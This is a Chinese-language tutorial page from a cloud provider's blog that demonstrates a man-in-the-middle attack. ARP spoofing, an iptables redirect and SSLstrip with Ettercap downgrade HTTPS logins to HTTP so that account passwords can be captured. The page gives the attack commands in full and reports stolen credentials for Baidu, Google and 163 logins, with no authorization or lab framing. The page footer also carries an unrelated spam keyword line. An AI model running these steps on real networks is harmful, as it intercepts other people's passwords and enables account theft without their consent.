溫馨提示×

溫馨提示×

您好，登錄后才能下訂單哦！

密碼登錄×

忘記密碼？

登錄注冊×

獲取短信驗證碼

其他方式登錄

點擊登錄注冊即表示同意《億速云用戶服務條款》

用戶登錄×

賬戶密碼登錄

請使用微信掃描上方二維碼

使用幫助

請求超時！

請點擊重新獲取二維碼

SSLstrip 中間人欺騙Https轉Http獲取密碼

發布時間：2020-07-20 23:19:13 來源：網絡閱讀：2312 作者：GeForever 欄目：安全技術

SSLstrip 中間人欺騙Https轉Http獲取密碼

SSLstrip 中間人欺騙Https轉Http獲取密碼

***回顧

SSLstrip + EtterCap 中間人***實現https轉換成http 以獲取帳號密碼。

Linux環境下我們使用iptables過濾一下數據包，然后用sslstrip監聽端口，獲取數據。

數據包轉發 echo 1 > /pro/sys/net/ipv4/ip_forward

然后開啟Ettercap的iptables 功能

SSLstrip 中間人欺騙Https轉Http獲取密碼

SSLstrip 中間人欺騙Https轉Http獲取密碼

把注析去掉

來個arp欺騙不使用sslstrip 來測試一下https

Arpspoof –i –eth0 –t 192.168.1.102 192.168.1.2

SSLstrip 中間人欺騙Https轉Http獲取密碼

Ok

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

NAT 一定的基礎

-T 匹配的表 NAT表：PREROUTING 修改來的包

：OUTPUT 修改路由前本地的包

：POSTROUTING 修改準備發出的包

-A 表示加入高級選項

-P 協議類型

-J 表示把目標80端口的數據包轉到其他端口上訴命令是10000端口

開啟ETTERCAP

Ettercap –T –q –I eth0

SSLstrip 中間人欺騙Https轉Http獲取密碼

SSLstrip 中間人欺騙Https轉Http獲取密碼

登錄http的百度效果良好

監聽到數據了

SSLstrip 中間人欺騙Https轉Http獲取密碼

SSLstrip 中間人欺騙Https轉Http獲取密碼

登錄google

發現在https 卡頓無法通過

SSLstrip 中間人欺騙Https轉Http獲取密碼

開啟sslstrip

SSLstrip 中間人欺騙Https轉Http獲取密碼

SSLstrip 中間人欺騙Https轉Http獲取密碼

再向google登錄的時候 https變成http

SSLstrip 中間人欺騙Https轉Http獲取密碼

成功登錄

SSLstrip 中間人欺騙Https轉Http獲取密碼

監聽到帳號密碼

SSLstrip 中間人欺騙Https轉Http獲取密碼

百度的

SSLstrip 中間人欺騙Https轉Http獲取密碼

SSLstrip 中間人欺騙Https轉Http獲取密碼

163的登錄

SSLstrip 中間人欺騙Https轉Http獲取密碼

http的跳轉

SSLstrip 中間人欺騙Https轉Http獲取密碼

網速過慢……

除了使用arpspoof 還可以使用

Ettercap –T –q –M arp:remote /192.168.1.101/ //

也是arp欺騙原理一樣的。

向AI問一下細節

推薦閱讀：

免責聲明：本站發布的內容（圖片、視頻和文字）以原創、轉載和分享為主，文章觀點不代表本網站立場，如果涉及侵權請聯系站長郵箱：is@yisu.com進行舉報，并提供相關證據，一經查實，將立刻刪除涉嫌侵權內容。

上一篇新聞：
mac os下常用命令
下一篇新聞：
IOS9 微信sdk升級指南

猜你喜歡

AI
助
手

產品服務

地區劃分

專題活動

幫助支持

關于我們

售后咨詢

7*24小時在線電話：400-100-2938

7*24小時在線 QQ：800811969

關注億速云

億速云公眾號

手機網站二維碼

亚洲午夜精品一区二区_中文无码日韩欧免_久久香蕉精品视频_欧美主播一区二区三区美女